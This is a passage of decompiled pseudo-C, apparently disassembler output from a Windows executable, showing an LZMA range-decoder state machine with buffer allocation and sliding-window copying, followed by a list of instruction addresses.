										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8));
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                        0x00000000
                        0x00406d5f
                        0x00406d5f
                        0x00406d64
                        0x00406ddb
                        0x00406de2
                        0x00406dec
                        0x004073cb
                        0x004073cb
                        0x004073ce
                        0x004073ce
                        0x004073d4
                        0x004073da
                        0x004073e0
                        0x004073fa
                        0x004073fd
                        0x00407403
                        0x0040740e
                        0x00407410
                        0x004073e2
                        0x004073e2
                        0x004073f1
                        0x004073f5
                        0x004073f5
                        0x0040741a
                        0x00407441
                        0x00407441
                        0x00407447
                        0x00407447
                        0x00000000
                        0x0040741c
                        0x0040741c
                        0x00407420
                        0x004075cf
                        0x00000000
                        0x004075cf
                        0x0040742c
                        0x00407433
                        0x0040743b
                        0x0040743e
                        0x00000000
                        0x0040743e
                        0x00406d66
                        0x00406d66
                        0x00406d6a
                        0x00406d72
                        0x00406d75
                        0x00406d77
                        0x00406d7a
                        0x00406d7c
                        0x00406d81
                        0x00406d84
                        0x00406d8b
                        0x00406d92
                        0x00406d95
                        0x00406da0
                        0x00406da8
                        0x00406da8
                        0x00406da2
                        0x00406da2
                        0x00406da2
                        0x00406d97
                        0x00406d97
                        0x00406d97
                        0x00406daf
                        0x00406dcd
                        0x00406dcf
                        0x00406fa2
                        0x00406fa2
                        0x00406fa5
                        0x00406fa8
                        0x00406fab
                        0x00406fae
                        0x00406fb1
                        0x00406fb4
                        0x00406fb7
                        0x00406fba
                        0x00406fc0
                        0x00406fd8
                        0x00406fdb
                        0x00406fde
                        0x00406fe1
                        0x00406fe1
                        0x00406fe4
                        0x00406fea
                        0x00406fc2
                        0x00406fc2
                        0x00406fca
                        0x00406fcf
                        0x00406fd1
                        0x00406fd3
                        0x00406fd3
                        0x00406ff4
                        0x00406ff7
                        0x00406f9a
                        0x00406fa0
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00406ff9
                        0x00406f75
                        0x00406f79
                        0x00407581
                        0x00000000
                        0x00407581
                        0x00406f7f
                        0x00406f82
                        0x00406f85
                        0x00406f89
                        0x00406f8c
                        0x00406f92
                        0x00406f94
                        0x00406f94
                        0x00406f97
                        0x00000000
                        0x00406f97
                        0x00406db1
                        0x00406db1
                        0x00406db4
                        0x00406dba
                        0x00406dbc
                        0x00406dbc
                        0x00406dbf
                        0x00406dc2
                        0x00406dc4
                        0x00406dc5
                        0x00406dc8
                        0x00406e35
                        0x00406e35
                        0x00406e39
                        0x00406e3c
                        0x00406e3f
                        0x00406e42
                        0x00406e45
                        0x00406e46
                        0x00406e49
                        0x00406e4b
                        0x00406e51
                        0x00406e54
                        0x00406e57
                        0x00406e5a
                        0x00406e5d
                        0x00406e63
                        0x00406e7f
                        0x00406e82
                        0x00406e85
                        0x00406e88
                        0x00406e8f
                        0x00406e95
                        0x00406e99
                        0x00406e65
                        0x00406e65
                        0x00406e69
                        0x00406e71
                        0x00406e76
                        0x00406e78
                        0x00406e7a
                        0x00406e7a
                        0x00406ea3
                        0x00406ea6
                        0x00406e1d
                        0x00406e1d
                        0x00406e23
                        0x00406ed6
                        0x00406edc
                        0x00000000
                        0x00000000
                        0x00406ede
                        0x00406ee1
                        0x00406ee4
                        0x00406ee7
                        0x00406eea
                        0x00406eed
                        0x00406ef0
                        0x00406ef3
                        0x00406ef6
                        0x00406efc
                        0x00406f14
                        0x00406f17
                        0x00406f1a
                        0x00406f1d
                        0x00406f1d
                        0x00406f20
                        0x00406f26
                        0x00406efe
                        0x00406efe
                        0x00406f06
                        0x00406f0b
                        0x00406f0d
                        0x00406f0f
                        0x00406f0f
                        0x00406f30
                        0x00406f33
                        0x00406eb1
                        0x00406eb5
                        0x00407575
                        0x00000000
                        0x00407575
                        0x00406ebb
                        0x00406ebe
                        0x00406ec1
                        0x00406ec5
                        0x00406ec8
                        0x00406ece
                        0x00406ed0
                        0x00406ed0
                        0x00406ed3
                        0x00406ed3
                        0x00406f33
                        0x00406f3a
                        0x00406f3a
                        0x00406f3a
                        0x00406f3e
                        0x00406f3e
                        0x00406f41
                        0x00406f44
                        0x00406f48
                        0x0040758d
                        0x00000000
                        0x0040758d
                        0x00406f4e
                        0x00406f51
                        0x00406f54
                        0x00406f57
                        0x00406f5a
                        0x00406f5d
                        0x00406f60
                        0x00406f62
                        0x00406f65
                        0x00406f68
                        0x00406f6b
                        0x00406f6d
                        0x00406f6d
                        0x00406f6d
                        0x0040710a
                        0x0040710a
                        0x0040710d
                        0x0040710d
                        0x00000000
                        0x0040710d
                        0x00406e2f
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00406eac
                        0x00406df8
                        0x00406dfc
                        0x00407569
                        0x004075e5
                        0x004075ed
                        0x004075f4
                        0x004075f6
                        0x004075fd
                        0x00407601
                        0x00407601
                        0x00406e02
                        0x00406e05
                        0x00406e08
                        0x00406e0c
                        0x00406e0f
                        0x00406e15
                        0x00406e17
                        0x00406e17
                        0x00406e1a
                        0x00000000
                        0x00406e1a
                        0x00406ea6
                        0x00406daf
                        0x00406be3
                        0x00406be3
                        0x00406bec
                        0x004075fa
                        0x004075fa
                        0x00000000
                        0x004075fa
                        0x00406bf2
                        0x00000000
